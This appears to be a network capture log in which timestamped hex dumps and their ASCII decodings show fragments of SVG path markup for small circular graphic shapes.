                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4687INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4703INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                                        Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4719INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4735INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                                        Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4751INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4841INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                                                                                                                                        Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4857INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4873INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4889INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                                                                                                                                        Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4905INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4921INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4937INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4953INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                                                        Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4969INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                                                                                                                                        Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4985INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5001INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                                                                                                                                        Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5017INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                                        Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
